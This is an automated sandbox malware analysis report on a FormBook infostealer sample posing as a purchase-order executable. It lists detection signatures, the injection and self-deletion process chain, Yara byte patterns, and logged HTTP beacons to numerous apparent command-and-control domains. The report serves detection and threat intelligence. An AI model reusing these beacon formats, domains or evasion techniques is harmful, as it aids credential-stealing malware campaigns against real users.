Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Purchase Order 40,7045$.exe

Overview

General Information

Sample Name:Purchase Order 40,7045$.exe
Analysis ID:321097
MD5:4142c1713da2f4f94bec71bfed46587b
SHA1:06cc7bd53758a0936f4b674847411a4f912fd654
SHA256:fd94ea05d07271de517e92af291ec6a8cff49cc83bb59f112efb6d5fec56809c
Tags:exeFormbook

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Executable has a suspicious name (potential lure to open the executable)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Uses ipconfig to lookup or modify the Windows network settings
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Purchase Order 40,7045$.exe (PID: 5468 cmdline: 'C:\Users\user\Desktop\Purchase Order 40,7045$.exe' MD5: 4142C1713DA2F4F94BEC71BFED46587B)
    • Purchase Order 40,7045$.exe (PID: 4392 cmdline: C:\Users\user\Desktop\Purchase Order 40,7045$.exe MD5: 4142C1713DA2F4F94BEC71BFED46587B)
      • explorer.exe (PID: 3292 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • ipconfig.exe (PID: 6420 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: B0C7423D02A007461C850CD0DFE09318)
          • cmd.exe (PID: 6524 cmdline: /c del 'C:\Users\user\Desktop\Purchase Order 40,7045$.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8772:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14085:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x13b71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14187:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x142ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x12dec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19167:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a1da:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16089:$sqlite3step: 68 34 1C 7B E1
    • 0x1619c:$sqlite3step: 68 34 1C 7B E1
    • 0x160b8:$sqlite3text: 68 38 2A 90 C5
    • 0x161dd:$sqlite3text: 68 38 2A 90 C5
    • 0x160cb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x161f3:$sqlite3blob: 68 53 D8 7F 8C
    00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8772:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14085:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x13b71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14187:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x142ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x12dec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19167:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a1da:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 13 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8772:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14085:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13b71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14187:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x142ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x12dec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19167:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1a1da:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x16089:$sqlite3step: 68 34 1C 7B E1
        • 0x1619c:$sqlite3step: 68 34 1C 7B E1
        • 0x160b8:$sqlite3text: 68 38 2A 90 C5
        • 0x161dd:$sqlite3text: 68 38 2A 90 C5
        • 0x160cb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x161f3:$sqlite3blob: 68 53 D8 7F 8C
        0.2.Purchase Order 40,7045$.exe.13a0000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          0.2.Purchase Order 40,7045$.exe.13a0000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x75d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13285:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x12d71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13387:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x134ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x837a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x11fec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x90f2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18367:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x193da:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 7 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus / Scanner detection for submitted sampleShow sources
          Source: Purchase Order 40,7045$.exeAvira: detected
          Multi AV Scanner detection for submitted fileShow sources
          Source: Purchase Order 40,7045$.exeVirustotal: Detection: 43%Perma Link
          Source: Purchase Order 40,7045$.exeReversingLabs: Detection: 36%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Purchase Order 40,7045$.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: Purchase Order 40,7045$.exeJoe Sandbox ML: detected
          Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 4x nop then pop edi1_2_00415044
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 4x nop then pop edi1_2_00415C88
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 4x nop then pop ebx1_2_004066DA
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4x nop then pop edi5_2_02B15044
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4x nop then pop ebx5_2_02B066DA
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4x nop then pop edi5_2_02B15C88

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.7:49763
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=UfiOKa10s1yLusAItF3vWjkwpymqUGezPxY1yDNv0p/2lCJES87tx2Jt/J4nqwS7zvQC3NAVFw==&znedzJ=zZ08lr HTTP/1.1Host: www.maninhatphoto.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=OmOfrjMvab3UDLJ1b1EnqOCTc37h1hVhp845fGV3qso3nsvakJ1TSKu7MMbYjLc/Z57ALjfzyA==&znedzJ=zZ08lr HTTP/1.1Host: www.placeduconfort.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=t01Z4mSXZ4Sh37CVT0clKULR+978aEmcgNm0lDgXJlNj84H6aHXl5y5X4iKe7OtShPmXJ1O/Pg==&znedzJ=zZ08lr HTTP/1.1Host: www.heartandcrowncloset.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=e47LXRShpINFItPSGlU3D/kbksa3SWNeF5M0wKVSE3MTkWZptzimgsXyJgV91SEk9qVnlKbrpg==&znedzJ=zZ08lr HTTP/1.1Host: www.fahufu.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=86BqMRXKwVnGWLvcWU9i/TAM/7rVhuijReL1UQww2BMw3v63ywTnKR2tmrSinvnZEbGuhDJZ6g==&znedzJ=zZ08lr HTTP/1.1Host: www.the-gongs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=93/Rz74I7LmyoPrfkHQz5Aq7QtSit3A8iuxJ0AYKOw4Fhqt5y6XHOpUvAHedIRknYvzWThccTQ==&znedzJ=zZ08lr HTTP/1.1Host: www.shopnicknaks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=YEhaVrRn7U1iAIlzVSLmJg7Vd2zqgykvRGHwZQMAJohu7B6Tc4aodga4QJsBa4H1R4p9GZQDmA==&znedzJ=zZ08lr HTTP/1.1Host: www.sweetbasilmarketing.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=4h23ofVf0wd/XYFA6lbDKykObBKMIHvT+gmvC/ZN8Gk4kRGXSO1DXfeAEB+QG0mLIMq1kVYlzw==&znedzJ=zZ08lr HTTP/1.1Host: www.justsoldbykristen.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=b5xSTUUVmbOqauvhDdE25zWaspHItZbymNmRh6QlTutVQGy0NN3SxEYa8xhGCB9WO75ae6tE3A==&znedzJ=zZ08lr HTTP/1.1Host: www.ariasu-nakanokaikei.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=rdOgkBqGTQXOs3KWXTswN+BO77q1iYhhtKfbkpaHvFu47hc7CbfKDDDhaf9YD51rtmp9fiqQ6Q==&znedzJ=zZ08lr HTTP/1.1Host: www.realitytvstockwatch.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=HPW2WyZF3+vAEuPCsfs94a0V0pGSpSCTGdq4luVMg5IcQk4WROkoYp4gl4PZZku0mN/660XlTQ==&znedzJ=zZ08lr HTTP/1.1Host: www.searchnehomes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=nB3I2im5F8HSwElcMB6r2r7aYFb3l14g4Fl69Fm1UyuWMpfJzwOjmqIJuIfJqip3lhGwdegm9w==&znedzJ=zZ08lr HTTP/1.1Host: www.happinestbuilders.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=xFlHIrj+O5a3po2FyI6qdarcVpFay3CC2mUufkmJsWJU6dqoom027fC98Qm7USnQA3DnFd91lQ==&znedzJ=zZ08lr HTTP/1.1Host: www.hemparcade.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 52.58.78.16 52.58.78.16
          Source: Joe Sandbox ViewIP Address: 185.201.11.126 185.201.11.126
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: Joe Sandbox ViewASN Name: DEDIPATH-LLCUS DEDIPATH-LLCUS
          Source: Joe Sandbox ViewASN Name: AS-HOSTINGERLT AS-HOSTINGERLT
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=UfiOKa10s1yLusAItF3vWjkwpymqUGezPxY1yDNv0p/2lCJES87tx2Jt/J4nqwS7zvQC3NAVFw==&znedzJ=zZ08lr HTTP/1.1Host: www.maninhatphoto.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=OmOfrjMvab3UDLJ1b1EnqOCTc37h1hVhp845fGV3qso3nsvakJ1TSKu7MMbYjLc/Z57ALjfzyA==&znedzJ=zZ08lr HTTP/1.1Host: www.placeduconfort.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=t01Z4mSXZ4Sh37CVT0clKULR+978aEmcgNm0lDgXJlNj84H6aHXl5y5X4iKe7OtShPmXJ1O/Pg==&znedzJ=zZ08lr HTTP/1.1Host: www.heartandcrowncloset.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=e47LXRShpINFItPSGlU3D/kbksa3SWNeF5M0wKVSE3MTkWZptzimgsXyJgV91SEk9qVnlKbrpg==&znedzJ=zZ08lr HTTP/1.1Host: www.fahufu.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=86BqMRXKwVnGWLvcWU9i/TAM/7rVhuijReL1UQww2BMw3v63ywTnKR2tmrSinvnZEbGuhDJZ6g==&znedzJ=zZ08lr HTTP/1.1Host: www.the-gongs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=93/Rz74I7LmyoPrfkHQz5Aq7QtSit3A8iuxJ0AYKOw4Fhqt5y6XHOpUvAHedIRknYvzWThccTQ==&znedzJ=zZ08lr HTTP/1.1Host: www.shopnicknaks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=YEhaVrRn7U1iAIlzVSLmJg7Vd2zqgykvRGHwZQMAJohu7B6Tc4aodga4QJsBa4H1R4p9GZQDmA==&znedzJ=zZ08lr HTTP/1.1Host: www.sweetbasilmarketing.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=4h23ofVf0wd/XYFA6lbDKykObBKMIHvT+gmvC/ZN8Gk4kRGXSO1DXfeAEB+QG0mLIMq1kVYlzw==&znedzJ=zZ08lr HTTP/1.1Host: www.justsoldbykristen.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=b5xSTUUVmbOqauvhDdE25zWaspHItZbymNmRh6QlTutVQGy0NN3SxEYa8xhGCB9WO75ae6tE3A==&znedzJ=zZ08lr HTTP/1.1Host: www.ariasu-nakanokaikei.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=rdOgkBqGTQXOs3KWXTswN+BO77q1iYhhtKfbkpaHvFu47hc7CbfKDDDhaf9YD51rtmp9fiqQ6Q==&znedzJ=zZ08lr HTTP/1.1Host: www.realitytvstockwatch.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=HPW2WyZF3+vAEuPCsfs94a0V0pGSpSCTGdq4luVMg5IcQk4WROkoYp4gl4PZZku0mN/660XlTQ==&znedzJ=zZ08lr HTTP/1.1Host: www.searchnehomes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=nB3I2im5F8HSwElcMB6r2r7aYFb3l14g4Fl69Fm1UyuWMpfJzwOjmqIJuIfJqip3lhGwdegm9w==&znedzJ=zZ08lr HTTP/1.1Host: www.happinestbuilders.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=xFlHIrj+O5a3po2FyI6qdarcVpFay3CC2mUufkmJsWJU6dqoom027fC98Qm7USnQA3DnFd91lQ==&znedzJ=zZ08lr HTTP/1.1Host: www.hemparcade.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.handsfreedocs.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 20 Nov 2020 10:07:21 GMTContent-Type: text/htmlContent-Length: 153Connection: closeServer: nginx/1.16.1Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000002.00000002.517836476.0000000006845000.00000004.00000001.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: ipconfig.exe, 00000005.00000002.505735248.00000000036FD000.00000004.00000001.sdmpString found in binary or memory: http://www.hemparcade.com
          Source: ipconfig.exe, 00000005.00000002.505735248.00000000036FD000.00000004.00000001.sdmpString found in binary or memory: http://www.hemparcade.com/
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: ipconfig.exe, 00000005.00000002.505735248.00000000036FD000.00000004.00000001.sdmpString found in binary or memory: http://yuyabo.com/

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Purchase Order 40,7045$.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
